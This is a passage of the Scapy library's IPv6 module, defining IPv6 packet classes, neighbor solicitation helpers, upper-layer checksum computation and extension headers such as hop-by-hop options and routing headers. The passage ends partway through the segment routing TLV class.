1# SPDX-License-Identifier: GPL-2.0-only 2# This file is part of Scapy 3# See https://scapy.net/ for more information 4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp> 5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net> 6 7# Cool history about this file: http://natisbad.org/scapy/index.html 8 9 10""" 11IPv6 (Internet Protocol v6). 12""" 13 14 15from hashlib import md5 16import random 17import socket 18import struct 19from time import gmtime, strftime 20 21from scapy.arch import get_if_hwaddr 22from scapy.as_resolvers import AS_resolver_riswhois 23from scapy.base_classes import Gen, _ScopedIP 24from scapy.compat import chb, orb, raw, plain_str, bytes_encode 25from scapy.consts import WINDOWS 26from scapy.config import conf 27from scapy.data import ( 28 DLT_IPV6, 29 DLT_RAW, 30 DLT_RAW_ALT, 31 ETHER_ANY, 32 ETH_P_ALL, 33 ETH_P_IPV6, 34 MTU, 35) 36from scapy.error import log_runtime, warning 37from scapy.fields import ( 38 BitEnumField, 39 BitField, 40 ByteEnumField, 41 ByteField, 42 DestIP6Field, 43 FieldLenField, 44 FlagsField, 45 IntField, 46 IP6Field, 47 LongField, 48 MACField, 49 MayEnd, 50 PacketLenField, 51 PacketListField, 52 ShortEnumField, 53 ShortField, 54 SourceIP6Field, 55 StrField, 56 StrFixedLenField, 57 StrLenField, 58 X3BytesField, 59 XBitField, 60 XByteField, 61 XIntField, 62 XShortField, 63) 64from scapy.layers.inet import ( 65 _ICMPExtensionField, 66 _ICMPExtensionPadField, 67 _ICMP_extpad_post_dissection, 68 IP, 69 IPTools, 70 TCP, 71 TCPerror, 72 TracerouteResult, 73 UDP, 74 UDPerror, 75) 76from scapy.layers.l2 import ( 77 CookedLinux, 78 Ether, 79 GRE, 80 Loopback, 81 SNAP, 82 SourceMACField, 83) 84from scapy.packet import bind_layers, Packet, Raw 85from scapy.sendrecv import sendp, sniff, sr, srp1 86from scapy.supersocket import SuperSocket 87from scapy.utils import checksum, strxor 88from scapy.pton_ntop import inet_pton, inet_ntop 89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \ 90 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \ 91 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo 92from scapy.volatile import RandInt, RandShort 93 94# Typing 95from typing import ( 96 Optional, 97) 98 99if not socket.has_ipv6: 100 raise socket.error("can't use AF_INET6, IPv6 is disabled") 101if not hasattr(socket, "IPPROTO_IPV6"): 102 # Workaround for http://bugs.python.org/issue6926 103 socket.IPPROTO_IPV6 = 41 104if not hasattr(socket, "IPPROTO_IPIP"): 105 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 106 socket.IPPROTO_IPIP = 4 107 108if conf.route6 is None: 109 # unused import, only to initialize conf.route6 110 import scapy.route6 # noqa: F401 111 112########################## 113# Neighbor cache stuff # 114########################## 115 116conf.netcache.new_cache("in6_neighbor", 120) 117 118 119@conf.commands.register 120def neighsol(addr, src, iface, timeout=1, chainCC=0): 121 """Sends and receive an ICMPv6 Neighbor Solicitation message 122 123 This function sends an ICMPv6 Neighbor Solicitation message 124 to get the MAC address of the neighbor with specified IPv6 address address. 125 126 'src' address is used as the source IPv6 address of the message. Message 127 is sent on 'iface'. The source MAC address is retrieved accordingly. 128 129 By default, timeout waiting for an answer is 1 second. 130 131 If no answer is gathered, None is returned. Else, the answer is 132 returned (ethernet frame). 133 """ 134 135 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) 136 d = inet_ntop(socket.AF_INET6, nsma) 137 dm = in6_getnsmac(nsma) 138 sm = get_if_hwaddr(iface) 139 p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255) 140 p /= ICMPv6ND_NS(tgt=addr) 141 p /= ICMPv6NDOptSrcLLAddr(lladdr=sm) 142 res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0, 143 chainCC=chainCC) 144 145 return res 146 147 148@conf.commands.register 149def getmacbyip6(ip6, chainCC=0): 150 # type: (str, int) -> Optional[str] 151 """ 152 Returns the MAC address of the next hop used to reach a given IPv6 address. 153 154 neighborCache.get() method is used on instantiated neighbor cache. 155 Resolution mechanism is described in associated doc string. 156 157 (chainCC parameter value ends up being passed to sending function 158 used to perform the resolution, if needed) 159 160 .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4. 161 """ 162 # Sanitize the IP 163 if isinstance(ip6, Net6): 164 ip6 = str(ip6) 165 166 # Multicast 167 if in6_ismaddr(ip6): # mcast @ 168 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) 169 return mac 170 171 iff, a, nh = conf.route6.route(ip6) 172 173 if iff == conf.loopback_name: 174 return "ff:ff:ff:ff:ff:ff" 175 176 if nh != '::': 177 ip6 = nh # Found next hop 178 179 mac = conf.netcache.in6_neighbor.get(ip6) 180 if mac: 181 return mac 182 183 res = neighsol(ip6, a, iff, chainCC=chainCC) 184 185 if res is not None: 186 if ICMPv6NDOptDstLLAddr in res: 187 mac = res[ICMPv6NDOptDstLLAddr].lladdr 188 else: 189 mac = res.src 190 conf.netcache.in6_neighbor[ip6] = mac 191 return mac 192 193 return None 194 195 196############################################################################# 197############################################################################# 198# IPv6 Class # 199############################################################################# 200############################################################################# 201 202ipv6nh = {0: "Hop-by-Hop Option Header", 203 4: "IP", 204 6: "TCP", 205 17: "UDP", 206 41: "IPv6", 207 43: "Routing Header", 208 44: "Fragment Header", 209 47: "GRE", 210 50: "ESP Header", 211 51: "AH Header", 212 58: "ICMPv6", 213 59: "No Next Header", 214 60: "Destination Option Header", 215 112: "VRRP", 216 132: "SCTP", 217 135: "Mobility Header"} 218 219ipv6nhcls = {0: "IPv6ExtHdrHopByHop", 220 4: "IP", 221 6: "TCP", 222 17: "UDP", 223 43: "IPv6ExtHdrRouting", 224 44: "IPv6ExtHdrFragment", 225 50: "ESP", 226 51: "AH", 227 58: "ICMPv6Unknown", 228 59: "Raw", 229 60: "IPv6ExtHdrDestOpt"} 230 231 232class IP6ListField(StrField): 233 __slots__ = ["count_from", "length_from"] 234 islist = 1 235 236 def __init__(self, name, default, count_from=None, length_from=None): 237 if default is None: 238 default = [] 239 StrField.__init__(self, name, default) 240 self.count_from = count_from 241 self.length_from = length_from 242 243 def i2len(self, pkt, i): 244 return 16 * len(i) 245 246 def i2count(self, pkt, i): 247 if isinstance(i, list): 248 return len(i) 249 return 0 250 251 def getfield(self, pkt, s): 252 c = tmp_len = None 253 if self.length_from is not None: 254 tmp_len = self.length_from(pkt) 255 elif self.count_from is not None: 256 c = self.count_from(pkt) 257 258 lst = [] 259 ret = b"" 260 remain = s 261 if tmp_len is not None: 262 remain, ret = s[:tmp_len], s[tmp_len:] 263 while remain: 264 if c is not None: 265 if c <= 0: 266 break 267 c -= 1 268 addr = inet_ntop(socket.AF_INET6, remain[:16]) 269 lst.append(addr) 270 remain = remain[16:] 271 return remain + ret, lst 272 273 def i2m(self, pkt, x): 274 s = b"" 275 for y in x: 276 try: 277 y = inet_pton(socket.AF_INET6, y) 278 except Exception: 279 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] 280 y = inet_pton(socket.AF_INET6, y) 281 s += y 282 return s 283 284 def i2repr(self, pkt, x): 285 s = [] 286 if x is None: 287 return "[]" 288 for y in x: 289 s.append('%s' % y) 290 return "[ %s ]" % (", ".join(s)) 291 292 293class _IPv6GuessPayload: 294 name = "Dummy class that implements guess_payload_class() for IPv6" 295 296 def default_payload_class(self, p): 297 if self.nh == 58: # ICMPv6 298 t = orb(p[0]) 299 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query 300 return _niquery_guesser(p) 301 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501 302 if t == 130 and len(p) >= 28: 303 # RFC 3810 - 8.1. Query Version Distinctions 304 return ICMPv6MLQuery2 305 return icmp6typescls.get(t, Raw) 306 return Raw 307 elif self.nh == 135 and len(p) > 3: # Mobile IPv6 308 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) 309 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header 310 return IPv6ExtHdrSegmentRouting 311 return ipv6nhcls.get(self.nh, Raw) 312 313 314class IPv6(_IPv6GuessPayload, Packet, IPTools): 315 name = "IPv6" 316 fields_desc = [BitField("version", 6, 4), 317 BitField("tc", 0, 8), 318 BitField("fl", 0, 20), 319 ShortField("plen", None), 320 ByteEnumField("nh", 59, ipv6nh), 321 ByteField("hlim", 64), 322 SourceIP6Field("src"), 323 DestIP6Field("dst", "::1")] 324 325 def route(self): 326 """Used to select the L2 address""" 327 dst = self.dst 328 scope = None 329 if isinstance(dst, (Net6, _ScopedIP)): 330 scope = dst.scope 331 if isinstance(dst, (Gen, list)): 332 dst = next(iter(dst)) 333 return conf.route6.route(dst, dev=scope) 334 335 def mysummary(self): 336 return "%s > %s (%i)" % (self.src, self.dst, self.nh) 337 338 def post_build(self, p, pay): 339 p += pay 340 if self.plen is None: 341 tmp_len = len(p) - 40 342 p = p[:4] + struct.pack("!H", tmp_len) + p[6:] 343 return p 344 345 def extract_padding(self, data): 346 """Extract the IPv6 payload""" 347 348 if self.plen == 0 and self.nh == 0 and len(data) >= 8: 349 # Extract Hop-by-Hop extension length 350 hbh_len = orb(data[1]) 351 hbh_len = 8 + hbh_len * 8 352 353 # Extract length from the Jumbogram option 354 # Note: the following algorithm take advantage of the Jumbo option 355 # mandatory alignment (4n + 2, RFC2675 Section 2) 356 jumbo_len = None 357 idx = 0 358 offset = 4 * idx + 2 359 while offset <= len(data): 360 opt_type = orb(data[offset]) 361 if opt_type == 0xc2: # Jumbo option 362 jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501 363 break 364 offset = 4 * idx + 2 365 idx += 1 366 367 if jumbo_len is None: 368 log_runtime.info("Scapy did not find a Jumbo option") 369 jumbo_len = 0 370 371 tmp_len = hbh_len + jumbo_len 372 else: 373 tmp_len = self.plen 374 375 return data[:tmp_len], data[tmp_len:] 376 377 def hashret(self): 378 if self.nh == 58 and isinstance(self.payload, _ICMPv6): 379 if self.payload.type < 128: 380 return self.payload.payload.hashret() 381 elif (self.payload.type in [133, 134, 135, 136, 144, 145]): 382 return struct.pack("B", self.nh) + self.payload.hashret() 383 384 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 385 return self.payload.hashret() 386 387 nh = self.nh 388 sd = self.dst 389 ss = self.src 390 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): 391 # With routing header, the destination is the last 392 # address of the IPv6 list if segleft > 0 393 nh = self.payload.nh 394 try: 395 sd = self.addresses[-1] 396 except IndexError: 397 sd = '::1' 398 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501 399 # could be anything from the original list ... 400 if 1: 401 sd = inet_pton(socket.AF_INET6, sd) 402 for a in self.addresses: 403 a = inet_pton(socket.AF_INET6, a) 404 sd = strxor(sd, a) 405 sd = inet_ntop(socket.AF_INET6, sd) 406 407 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 408 # With segment routing header (rh == 4), the destination is 409 # the first address of the IPv6 addresses list 410 try: 411 sd = self.addresses[0] 412 except IndexError: 413 sd = self.dst 414 415 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): 416 nh = self.payload.nh 417 418 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): 419 nh = self.payload.nh 420 421 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): 422 foundhao = None 423 for o in self.payload.options: 424 if isinstance(o, HAO): 425 foundhao = o 426 if foundhao: 427 ss = foundhao.hoa 428 nh = self.payload.nh # XXX what if another extension follows ? 429 430 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): 431 sd = inet_pton(socket.AF_INET6, sd) 432 ss = inet_pton(socket.AF_INET6, ss) 433 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501 434 else: 435 return struct.pack("B", nh) + self.payload.hashret() 436 437 def answers(self, other): 438 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP 439 if self.nh in [4, 41]: 440 return self.payload.answers(other) 441 if isinstance(other, IPv6) and other.nh in [4, 41]: 442 return self.answers(other.payload) 443 if isinstance(other, IP) and other.proto in [4, 41]: 444 return self.answers(other.payload) 445 if not isinstance(other, IPv6): # self is reply, other is request 446 return False 447 if conf.checkIPaddr: 448 # ss = inet_pton(socket.AF_INET6, self.src) 449 sd = inet_pton(socket.AF_INET6, self.dst) 450 os = inet_pton(socket.AF_INET6, other.src) 451 od = inet_pton(socket.AF_INET6, other.dst) 452 # request was sent to a multicast address (other.dst) 453 # Check reply destination addr matches request source addr (i.e 454 # sd == os) except when reply is multicasted too 455 # XXX test mcast scope matching ? 456 if in6_ismaddr(other.dst): 457 if in6_ismaddr(self.dst): 458 if ((od == sd) or 459 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501 460 return self.payload.answers(other.payload) 461 return False 462 if (os == sd): 463 return self.payload.answers(other.payload) 464 return False 465 elif (sd != os): # or ss != od): <- removed for ICMP errors 466 return False 467 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501 468 # ICMPv6 Error message -> generated by IPv6 packet 469 # Note : at the moment, we jump the ICMPv6 specific class 470 # to call answers() method of erroneous packet (over 471 # initial packet). There can be cases where an ICMPv6 error 472 # class could implement a specific answers method that perform 473 # a specific task. Currently, don't see any use ... 474 return self.payload.payload.answers(other) 475 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): 476 return self.payload.answers(other.payload) 477 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): 478 return self.payload.answers(other.payload.payload) 479 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): 480 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 481 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501 482 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501 483 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): 484 return self.payload.answers(other.payload.payload) 485 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501 486 return self.payload.payload.answers(other.payload) 487 else: 488 if (self.nh != other.nh): 489 return False 490 return self.payload.answers(other.payload) 491 492 493class IPv46(IP, IPv6): 494 """ 495 This class implements a dispatcher that is used to detect the IP version 496 while parsing Raw IP pcap files. 497 """ 498 name = "IPv4/6" 499 500 @classmethod 501 def dispatch_hook(cls, _pkt=None, *_, **kargs): 502 if _pkt: 503 if orb(_pkt[0]) >> 4 == 6: 504 return IPv6 505 elif kargs.get("version") == 6: 506 return IPv6 507 return IP 508 509 510def inet6_register_l3(l2, l3): 511 """ 512 Resolves the default L2 destination address when IPv6 is used. 513 """ 514 return getmacbyip6(l3.dst) 515 516 517conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) 518 519 520class IPerror6(IPv6): 521 name = "IPv6 in ICMPv6" 522 523 def answers(self, other): 524 if not isinstance(other, IPv6): 525 return False 526 sd = inet_pton(socket.AF_INET6, self.dst) 527 ss = inet_pton(socket.AF_INET6, self.src) 528 od = inet_pton(socket.AF_INET6, other.dst) 529 os = inet_pton(socket.AF_INET6, other.src) 530 531 # Make sure that the ICMPv6 error is related to the packet scapy sent 532 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: 533 534 # find upper layer for self (possible citation) 535 selfup = self.payload 536 while selfup is not None and isinstance(selfup, _IPv6ExtHdr): 537 selfup = selfup.payload 538 539 # find upper layer for other (initial packet). Also look for RH 540 otherup = other.payload 541 request_has_rh = False 542 while otherup is not None and isinstance(otherup, _IPv6ExtHdr): 543 if isinstance(otherup, IPv6ExtHdrRouting): 544 request_has_rh = True 545 otherup = otherup.payload 546 547 if ((ss == os and sd == od) or # < Basic case 548 (ss == os and request_has_rh)): 549 # ^ Request has a RH : don't check dst address 550 551 # Let's deal with possible MSS Clamping 552 if (isinstance(selfup, TCP) and 553 isinstance(otherup, TCP) and 554 selfup.options != otherup.options): # seems clamped 555 556 # Save fields modified by MSS clamping 557 old_otherup_opts = otherup.options 558 old_otherup_cksum = otherup.chksum 559 old_otherup_dataofs = otherup.dataofs 560 old_selfup_opts = selfup.options 561 old_selfup_cksum = selfup.chksum 562 old_selfup_dataofs = selfup.dataofs 563 564 # Nullify them 565 otherup.options = [] 566 otherup.chksum = 0 567 otherup.dataofs = 0 568 selfup.options = [] 569 selfup.chksum = 0 570 selfup.dataofs = 0 571 572 # Test it and save result 573 s1 = raw(selfup) 574 s2 = raw(otherup) 575 tmp_len = min(len(s1), len(s2)) 576 res = s1[:tmp_len] == s2[:tmp_len] 577 578 # recall saved values 579 otherup.options = old_otherup_opts 580 otherup.chksum = old_otherup_cksum 581 otherup.dataofs = old_otherup_dataofs 582 selfup.options = old_selfup_opts 583 selfup.chksum = old_selfup_cksum 584 selfup.dataofs = old_selfup_dataofs 585 586 return res 587 588 s1 = raw(selfup) 589 s2 = raw(otherup) 590 tmp_len = min(len(s1), len(s2)) 591 return s1[:tmp_len] == s2[:tmp_len] 592 593 return False 594 595 def mysummary(self): 596 return Packet.mysummary(self) 597 598 599############################################################################# 600############################################################################# 601# Upper Layer Checksum computation # 602############################################################################# 603############################################################################# 604 605class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation 606 name = "Pseudo IPv6 Header" 607 fields_desc = [IP6Field("src", "::"), 608 IP6Field("dst", "::"), 609 IntField("uplen", None), 610 BitField("zero", 0, 24), 611 ByteField("nh", 0)] 612 613 614def in6_pseudoheader(nh, u, plen): 615 # type: (int, IP, int) -> PseudoIPv6 616 """ 617 Build an PseudoIPv6 instance as specified in RFC 2460 8.1 618 619 This function operates by filling a pseudo header class instance 620 (PseudoIPv6) with: 621 - Next Header value 622 - the address of _final_ destination (if some Routing Header with non 623 segleft field is present in underlayer classes, last address is used.) 624 - the address of _real_ source (basically the source address of an 625 IPv6 class instance available in the underlayer or the source address 626 in HAO option if some Destination Option header found in underlayer 627 includes this option). 628 - the length is the length of provided payload string ('p') 629 630 :param nh: value of upper layer protocol 631 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be 632 provided with all under layers (IPv6 and all extension headers, 633 for example) 634 :param plen: the length of the upper layer and payload 635 """ 636 ph6 = PseudoIPv6() 637 ph6.nh = nh 638 rthdr = 0 639 hahdr = 0 640 final_dest_addr_found = 0 641 while u is not None and not isinstance(u, IPv6): 642 if (isinstance(u, IPv6ExtHdrRouting) and 643 u.segleft != 0 and len(u.addresses) != 0 and 644 final_dest_addr_found == 0): 645 rthdr = u.addresses[-1] 646 final_dest_addr_found = 1 647 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and 648 u.segleft != 0 and len(u.addresses) != 0 and 649 final_dest_addr_found == 0): 650 rthdr = u.addresses[0] 651 final_dest_addr_found = 1 652 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and 653 isinstance(u.options[0], HAO)): 654 hahdr = u.options[0].hoa 655 u = u.underlayer 656 if u is None: 657 warning("No IPv6 underlayer to compute checksum. Leaving null.") 658 return None 659 if hahdr: 660 ph6.src = hahdr 661 else: 662 ph6.src = u.src 663 if rthdr: 664 ph6.dst = rthdr 665 else: 666 ph6.dst = u.dst 667 ph6.uplen = plen 668 return ph6 669 670 671def in6_chksum(nh, u, p): 672 """ 673 As Specified in RFC 2460 - 8.1 Upper-Layer Checksums 674 675 See also `.in6_pseudoheader` 676 677 :param nh: value of upper layer protocol 678 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be 679 provided with all under layers (IPv6 and all extension headers, 680 for example) 681 :param p: the payload of the upper layer provided as a string 682 """ 683 ph6 = in6_pseudoheader(nh, u, len(p)) 684 if ph6 is None: 685 return 0 686 ph6s = raw(ph6) 687 return checksum(ph6s + p) 688 689 690############################################################################# 691############################################################################# 692# Extension Headers # 693############################################################################# 694############################################################################# 695 696 697# Inherited by all extension header classes 698class _IPv6ExtHdr(_IPv6GuessPayload, Packet): 699 name = 'Abstract IPv6 Option Header' 700 aliastypes = [IPv6, IPerror6] # TODO ... 701 702 703# IPv6 options for Extension Headers # 704 705_hbhopts = {0x00: "Pad1", 706 0x01: "PadN", 707 0x04: "Tunnel Encapsulation Limit", 708 0x05: "Router Alert", 709 0x06: "Quick-Start", 710 0xc2: "Jumbo Payload", 711 0xc9: "Home Address Option"} 712 713 714class _OTypeField(ByteEnumField): 715 """ 716 Modified BytEnumField that displays information regarding the IPv6 option 717 based on its option type value (What should be done by nodes that process 718 the option if they do not understand it ...) 719 720 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options 721 """ 722 pol = {0x00: "00: skip", 723 0x40: "01: discard", 724 0x80: "10: discard+ICMP", 725 0xC0: "11: discard+ICMP not mcast"} 726 727 enroutechange = {0x00: "0: Don't change en-route", 728 0x20: "1: May change en-route"} 729 730 def i2repr(self, pkt, x): 731 s = self.i2s.get(x, repr(x)) 732 polstr = self.pol[(x & 0xC0)] 733 enroutechangestr = self.enroutechange[(x & 0x20)] 734 return "%s [%s, %s]" % (s, polstr, enroutechangestr) 735 736 737class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option 738 name = "Scapy6 Unknown Option" 739 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 740 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 741 StrLenField("optdata", "", 742 length_from=lambda pkt: pkt.optlen)] 743 744 def alignment_delta(self, curpos): # By default, no alignment requirement 745 """ 746 As specified in section 4.2 of RFC 2460, every options has 747 an alignment requirement usually expressed xn+y, meaning 748 the Option Type must appear at an integer multiple of x octets 749 from the start of the header, plus y octets. 750 751 That function is provided the current position from the 752 start of the header and returns required padding length. 753 """ 754 return 0 755 756 @classmethod 757 def dispatch_hook(cls, _pkt=None, *args, **kargs): 758 if _pkt: 759 o = orb(_pkt[0]) # Option type 760 if o in _hbhoptcls: 761 return _hbhoptcls[o] 762 return cls 763 764 def extract_padding(self, p): 765 return b"", p 766 767 768class Pad1(Packet): # IPv6 Hop-By-Hop Option 769 name = "Pad1" 770 fields_desc = [_OTypeField("otype", 0x00, _hbhopts)] 771 772 def alignment_delta(self, curpos): # No alignment requirement 773 return 0 774 775 def extract_padding(self, p): 776 return b"", p 777 778 779class PadN(Packet): # IPv6 Hop-By-Hop Option 780 name = "PadN" 781 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 782 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 783 StrLenField("optdata", "", 784 length_from=lambda pkt: pkt.optlen)] 785 786 def alignment_delta(self, curpos): # No alignment requirement 787 return 0 788 789 def extract_padding(self, p): 790 return b"", p 791 792 793class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option 794 name = "Router Alert" 795 fields_desc = [_OTypeField("otype", 0x05, _hbhopts), 796 ByteField("optlen", 2), 797 ShortEnumField("value", None, 798 {0: "Datagram contains a MLD message", 799 1: "Datagram contains RSVP message", 800 2: "Datagram contains an Active Network message", # noqa: E501 801 68: "NSIS NATFW NSLP", 802 69: "MPLS OAM", 803 65535: "Reserved"})] 804 # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501 805 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501 806 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501 807 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml 808 809 def alignment_delta(self, curpos): # alignment requirement : 2n+0 810 x = 2 811 y = 0 812 delta = x * ((curpos - y + x - 1) // x) + y - curpos 813 return delta 814 815 def extract_padding(self, p): 816 return b"", p 817 818 819class RplOption(Packet): # RFC 6553 - RPL Option 820 name = "RPL Option" 821 fields_desc = [_OTypeField("otype", 0x63, _hbhopts), 822 ByteField("optlen", 4), 823 BitField("Down", 0, 1), 824 BitField("RankError", 0, 1), 825 BitField("ForwardError", 0, 1), 826 BitField("unused", 0, 5), 827 XByteField("RplInstanceId", 0), 828 XShortField("SenderRank", 0)] 829 830 def alignment_delta(self, curpos): # alignment requirement : 2n+0 831 x = 2 832 y = 0 833 delta = x * ((curpos - y + x - 1) // x) + y - curpos 834 return delta 835 836 def extract_padding(self, p): 837 return b"", p 838 839 840class Jumbo(Packet): # IPv6 Hop-By-Hop Option 841 name = "Jumbo Payload" 842 fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), 843 ByteField("optlen", 4), 844 IntField("jumboplen", None)] 845 846 def alignment_delta(self, curpos): # alignment requirement : 4n+2 847 x = 4 848 y = 2 849 delta = x * ((curpos - y + x - 1) // x) + y - curpos 850 return delta 851 852 def extract_padding(self, p): 853 return b"", p 854 855 856class HAO(Packet): # IPv6 Destination Options Header Option 857 name = "Home Address Option" 858 fields_desc = [_OTypeField("otype", 0xC9, _hbhopts), 859 ByteField("optlen", 16), 860 IP6Field("hoa", "::")] 861 862 def alignment_delta(self, curpos): # alignment requirement : 8n+6 863 x = 8 864 y = 6 865 delta = x * ((curpos - y + x - 1) // x) + y - curpos 866 return delta 867 868 def extract_padding(self, p): 869 return b"", p 870 871 872_hbhoptcls = {0x00: Pad1, 873 0x01: PadN, 874 0x05: RouterAlert, 875 0x63: RplOption, 876 0xC2: Jumbo, 877 0xC9: HAO} 878 879 880# Hop-by-Hop Extension Header # 881 882class _OptionsField(PacketListField): 883 __slots__ = ["curpos"] 884 885 def __init__(self, name, default, cls, curpos, *args, **kargs): 886 self.curpos = curpos 887 PacketListField.__init__(self, name, default, cls, *args, **kargs) 888 889 def i2len(self, pkt, i): 890 return len(self.i2m(pkt, i)) 891 892 def i2m(self, pkt, x): 893 autopad = None 894 try: 895 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field 896 except Exception: 897 autopad = 1 898 899 if not autopad: 900 return b"".join(map(bytes, x)) 901 902 curpos = self.curpos 903 s = b"" 904 for p in x: 905 d = p.alignment_delta(curpos) 906 curpos += d 907 if d == 1: 908 s += raw(Pad1()) 909 elif d != 0: 910 s += raw(PadN(optdata=b'\x00' * (d - 2))) 911 pstr = raw(p) 912 curpos += len(pstr) 913 s += pstr 914 915 # Let's make the class including our option field 916 # a multiple of 8 octets long 917 d = curpos % 8 918 if d == 0: 919 return s 920 d = 8 - d 921 if d == 1: 922 s += raw(Pad1()) 923 elif d != 0: 924 s += raw(PadN(optdata=b'\x00' * (d - 2))) 925 926 return s 927 928 def addfield(self, pkt, s, val): 929 return s + self.i2m(pkt, val) 930 931 932class _PhantomAutoPadField(ByteField): 933 def addfield(self, pkt, s, val): 934 return s 935 936 def getfield(self, pkt, s): 937 return s, 1 938 939 def i2repr(self, pkt, x): 940 if x: 941 return "On" 942 return "Off" 943 944 945class IPv6ExtHdrHopByHop(_IPv6ExtHdr): 946 name = "IPv6 Extension Header - Hop-by-Hop Options Header" 947 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 948 FieldLenField("len", None, length_of="options", fmt="B", 949 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 950 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 951 _OptionsField("options", [], HBHOptUnknown, 2, 952 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 953 overload_fields = {IPv6: {"nh": 0}} 954 955 956# Destination Option Header # 957 958class IPv6ExtHdrDestOpt(_IPv6ExtHdr): 959 name = "IPv6 Extension Header - Destination Options Header" 960 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 961 FieldLenField("len", None, length_of="options", fmt="B", 962 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 963 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 964 _OptionsField("options", [], HBHOptUnknown, 2, 965 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 966 overload_fields = {IPv6: {"nh": 60}} 967 968 969# Routing Header # 970 971class IPv6ExtHdrRouting(_IPv6ExtHdr): 972 name = "IPv6 Option Header Routing" 973 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 974 FieldLenField("len", None, count_of="addresses", fmt="B", 975 adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501 976 ByteField("type", 0), 977 ByteField("segleft", None), 978 BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501 979 IP6ListField("addresses", [], 980 length_from=lambda pkt: 8 * pkt.len)] 981 overload_fields = {IPv6: {"nh": 43}} 982 983 def post_build(self, pkt, pay): 984 if self.segleft is None: 985 pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:] 986 return _IPv6ExtHdr.post_build(self, pkt, pay) 987 988 989# Segment Routing Header # 990 991# This implementation is based on RFC8754, but some older snippets come from: 992# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 993 994_segment_routing_header_tlvs = { 995 # RFC 8754 sect 8.2 996 0: "Pad1 TLV", 997 1: "Ingress Node TLV", # draft 06 998 2: "Egress Node TLV", # draft 06 999 4: "PadN TLV", 1000 5: "HMAC TLV", 1001} 1002 1003 1004class IPv6ExtHdrSegmentRoutingTLV(Packet): 1005 name = "IPv6 Option Header Segment Routing - Generic TLV" 1006 # RFC 8754 sect 2.1 1007 fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs), 1008 ByteField("len", 0), 1009 StrLenField("value", "", length_from=lambda pkt: pkt.len)] 1010 1011 def extract_padding(self, p): 1012 return b"", 